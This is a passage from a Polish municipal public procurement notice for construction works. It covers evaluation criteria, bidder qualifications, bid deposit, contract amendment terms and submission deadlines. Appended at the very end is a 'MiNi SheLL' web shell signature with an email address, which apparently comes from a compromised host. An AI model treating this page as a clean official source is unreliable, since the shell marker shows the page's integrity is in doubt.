kryterium CENA<br/>Cena najniższa oferowana (brutto)<br/>Cena = ---------------------------------------------------- x 100 punktów x 60%<br/>Cena badanej oferty (brutto)<br/>- określenie OKRESU GWARANCJI w miesiącach:<br/>60 miesięcy gwarancji – 0 pkt,<br/>66 miesięcy gwarancji – 20 pkt,<br/>72 miesiące gwarancji – 40 pkt,<br/>3. Całkowita liczba punktów (K), jaką otrzyma dana oferta, zostanie obliczona będzie wg wzoru: K = C + G<br/>4. Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i<br/>innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej<br/>samej cenie Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego<br/>ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres oferowanej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/>1. posiadają doświadczenie, tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy, w tym okresie, co najmniej jedno zamówienie na budowę, przebudowę lub remont<br/>obiektu budowlanego o wartości nie mniejszej niż 2.000.000,00 zł brutto;* dotyczy zakresu A.<br/>2. dysponują osobami zdolnymi do wykonania zamówienia, tj.: minimum jedną osobą przewidzianą do pełnienia funkcji<br/>kierownika budowy posiadającą doświadczenie w kierowaniu robotami budowlanymi w branży budowlanej przy realizacji<br/>zamówienia dotyczącego budowy, przebudowy lub remontu obiektu budowlanego o wartości nie mniejszej niż 500.000,00 zł<br/>brutto oraz posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjnobudowlanej<br/>lub inne ważne uprawnienia do kierowania robotami budowlanymi odpowiadające tej specjalności, wydane na<br/>podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita<br/>Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego porozumienia o wolnym<br/>Handlu (EFTA) – stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, zgodnie z art. 12a<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. jedn. Dz. U. 2021 poz. 2351 ze zm.) oraz ustawy z dnia 22 grudnia 2015<br/>r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. jedn. Dz. U.<br/>2021 poz. 1646 ze zm.); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, zamówień spełniających warunki określone w punkcie 6 SWZ, wraz z podaniem ich wartości, przedmiotu,<br/>dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane [wg załącznika nr 6 do SWZ];<br/>2. referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane ujęte w wykazie wykonanych<br/>zamówień zostały wykonane, określające, czy roboty te zostały wykonane należycie (inne odpowiednie dokumenty, jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów);<br/>3. wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług<br/>lub kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami [wg załącznika nr 7 do SWZ];<br/>4. informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>5. zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów (dotyczy Wykonawców polegających na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby na podstawie art. 266 w zw. z art. 118 ust. 3 ustawy Pzp). wg załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wypełniony formularz ofertowy [wg załącznika nr 1 do SWZ];<br/>2. pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia<br/>publicznego (dotyczy spółek cywilnych, konsorcjów);<br/>3. pełnomocnictwo do podpisywania oferty lub poświadczania zgodności <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta w zakresie A musi być zabezpieczona wadium o wartości 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a. pieniądzu,<br/>b. gwarancjach bankowych,<br/>c. gwarancjach ubezpieczeniowych,<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. 2020 poz. 299).<br/>3. Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego nr 04 8775 0009 0030 0300 0198 0003<br/>z dopiskiem „WADIUM w postępowaniu ZP.271.4.2022”.<br/>4. Wadium wnoszone w formach, o których mowa w pkt 2 lit. b - d, powinno być wniesione w oryginale w postaci<br/>elektronicznej.<br/>5. Gwarancja (poręczenie) musi być podpisana przez upoważnionego przedstawiciela Gwaranta. Z treści gwarancji<br/>(poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych<br/>w art. 98 ust. 6 ustawy Prawo zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia (dotyczy spółki cywilnej, konsorcjum)<br/>Zamawiający wymaga, aby ustanowili pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub<br/>do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego (do oferty należy<br/>dołączyć stosowny dokument ustanawiający pełnomocnika np. pełnomocnictwo, umowę spółki cywilnej, umowę<br/>konsorcjum).W przypadku przedsiębiorców ubiegających się wspólnie o zamówienie (spółka cywilna, konsorcjum),<br/>przedsiębiorcy składają oddzielnie oświadczenia wymienione w punkcie 12 SWZ. Oświadczenia te potwierdzają spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający na podstawie art. 455 ust 1 ustawy przewiduje możliwość dokonania zmiany umowy w niżej wymienionych<br/>przypadkach.<br/>1). Zmiana terminu realizacji przedmiotu umowy będzie możliwa w przypadku:<br/>a) wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących<br/>niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,<br/>b) wstrzymania przez Zamawiającego wykonania robót nie wynikających z przyczyn leżących po stronie Wykonawcy.<br/>Powyższe nie dotyczy okoliczności wstrzymania robót przez Inspektora Nadzoru w przypadku stwierdzenia<br/>nieprawidłowości w wykonywaniu przedmiotu zamówienia,<br/>c) konieczności wprowadzenia przez Zamawiającego korekt w dokumentacji projektowej (usunięcie wad projektu lub<br/>wprowadzenie rozwiązań zamiennych),<br/>d). konieczności wykonania robót zamiennych, dodatkowych i innych niezbędnych do zakończenia przedmiotu umowy, w<br/>tym wynikających z korekty dokumentacji projektowej,<br/>e) zaistnienia okoliczności utrudniających lub uniemożliwiających terminowe zakończenie przedmiotu umowy takich jak:<br/>warunki archeologiczne, geologiczne, hydrauliczne, atmosferyczne (w szczególności warunki atmosferyczne odbiegające od<br/>typowych, uniemożliwiające wykonanie przedmiotu zamówienia), kolizje z sieciami infrastruktury technicznej,<br/>f) opóźnienia, utrudnienia lub przeszkód spowodowanych przez Zamawiającego lub dających się przypisać Zamawiającemu<br/>lub innemu wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy,<br/>g) działania siły wyższej.<br/>2). Zmiana wynagrodzenia:<br/>a) w przypadku zmiany ustawowej stawki VAT w okresie realizacji umowy – dotyczy wynagrodzenia za roboty, których nie<br/>zafakturowano na dzień wejścia w życie przepisów o zmianie VAT,<br/>b) w przypadku zmiany zakresu rzeczowo – finansowego wskutek zlecenia przez Zamawiającego wykonania robót<br/>koniecznych oraz wynikających z korekt dokumentacji projektowej (usuniecie wad projektu).<br/>3). Inne zmiany:<br/>a) zmiana zakresu rzeczowo – finansowego zamówienia w przypadku wystąpienia obiektywnych okoliczności skutkujących<br/>koniecznością zmiany w trakcie realizacji umowy zakresu rzeczowo – finansowego robót,<br/>b) rozszerzenie odpowiedzialności z tytułu gwarancji i rękojmi oraz przedłużenia terminu gwarancji i rękojmi w przypadku<br/>zaproponowania takiego rozwiązania przez Wykonawcę,<br/>c) zmian osób reprezentujących, pod warunkiem wcześniejszego powiadomienia i akceptacji drugiej strony, w przypadku<br/>śmierci, choroby lub innych zdarzeń losowych, lub jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn<br/>niezależnych od Zamawiającego lub Wykonawcy (np. rezygnacja, itp.).<br/>4).Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią<br/>one zobowiązania Zamawiającego na ich wprowadzenie.<br/>2. Zmiana postanowień umowy, o których mowa w ust. 1 § 18 może nastąpić w okresie obowiązywania umowy, na<br/>podstawie uzasadnionego, pisemnego wystąpienia jednej ze Stron niezwłocznie po zaistnieniu okoliczności powodujących<br/>zmianę umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-19 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na Platformie pod adresem https://kobylinborzymy.ezamawiajacy.pl przy użyciu formularzy umieszczonych w zakładce „Dokumenty zamówienia”. Składanie ofert polega na załączeniu podpisanych oświadczeń i dokumentów, o których mowa w rozdziale VI pkt 1 SWZ, oraz na przekazaniu ich Zamawiającemu za pośrednictwem Platformy poprzez dodanie ich w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca, którego oferta zostanie wybrana, przed podpisaniem umowy zobowiązany będzie dostarczyć<br/>Zamawiającemu:<br/>a) potwierdzone za zgodność z oryginałem kopie uprawnień budowlanych osób wskazanych do realizacji przedmiotu<br/>zamówienia oraz kopie zaświadczeń o przynależności wskazanych osób do właściwego samorządu zawodowego;<br/>b) opracowany przez Wykonawcę harmonogram rzeczowo – finansowy realizacji przedmiotu zamówienia;<br/>c) kosztorys ofertowy szczegółowy do złożonej oferty w podziale na rodzaje robót, z podaniem przyjętych parametrów<br/>cenotwórczych (R, S, Kp, Kz, Z) oraz ilości poszczególnych robót, ceny jednostkowej i wartości robót;<br/>d) aktualne ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności wobec mienia i osób trzecich, od<br/>zniszczenia wszelkiej własności spowodowanego działaniem, zaniechaniem lub niedopatrzeniem Wykonawcy, z polisą<br/>odpowiedzialności cywilnej na sumę ubezpieczenia równą minimum 3.000.000,00 zł; *(dotyczy tylko zakresu A)<br/>Harmonogram rzeczowo – finansowy realizacji przedmiotu zamówienia, o którym mowa w punkcie 3 lit. b, podlega<br/>akceptacji Zamawiającego.<br/>Ubezpieczenie od odpowiedzialności cywilnej deliktowej, o którym mowa punkcie 3 lit. d niniejszego rozdziału, powinno<br/>obejmować co najmniej:<br/>- OC za szkody osobowe i rzeczowe w odniesieniu do rzeczywistej straty - limit odpowiedzialności do pełnej sumy<br/>gwarancyjnej;<br/>- OC za szkody wyrządzone nieumyślnie, w tym wskutek rażącego niedbalstwa - limit odpowiedzialności do pełnej sumy<br/>gwarancyjnej;<br/>- OC za szkody wyrządzone przez podwykonawców Wykonawcy oraz dalszych podwykonawców (o ile będą zaangażowani<br/>przy realizacji przedmiotowego zamówienia) - limit odpowiedzialności do pełnej sumy gwarancyjnej.<br/>W przypadku, gdyby została wybrana oferta wykonawców wspólnie ubiegających się o zamówienie (dotyczy spółki cywilnej i<br/>konsorcjum), Zamawiający przed podpisaniem umowy może zażądać przedstawienia umowy regulującej ich współpracę.<br/>Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy lub nie wnosi<br/>wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może dokonać ponownego badania i oceny ofert<br/>spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić<br/>postępowanie.<br/>Wykonawca, którego oferta zostanie wybrana, do dnia podpisania umowy wniesie zabezpieczenie należytego wykonania<br/>umowy w wysokości stanowiącej 5% ceny ofertowej. *(dotyczy tylko zakresu A)<br/>Zabezpieczenie musi być wniesione w jednej lub kilku formach dopuszczonych ustawą Pzp, zgodnie z art. 450 ust. 1, tj. w:<br/>pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (z tym że<br/>zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych,<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Część zabezpieczenia należytego wykonania umowy w wysokości 70 % wartości całego zabezpieczenia zostanie zwolniona<br/>w terminie 30 dni od dnia przekazania przez Wykonawcę zrealizowanego w całości przedmiotu zamówienia i uznania go<br/>przez Zamawiającego za należycie wykonany. Pozostała część zabezpieczenia, tj. 30 % ogólnej wartości zostanie<br/>zwolniona nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji. Okres rękojmi za wady równy jest<br/>okresowi gwarancji na wykonane prace i zamontowane urządzenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com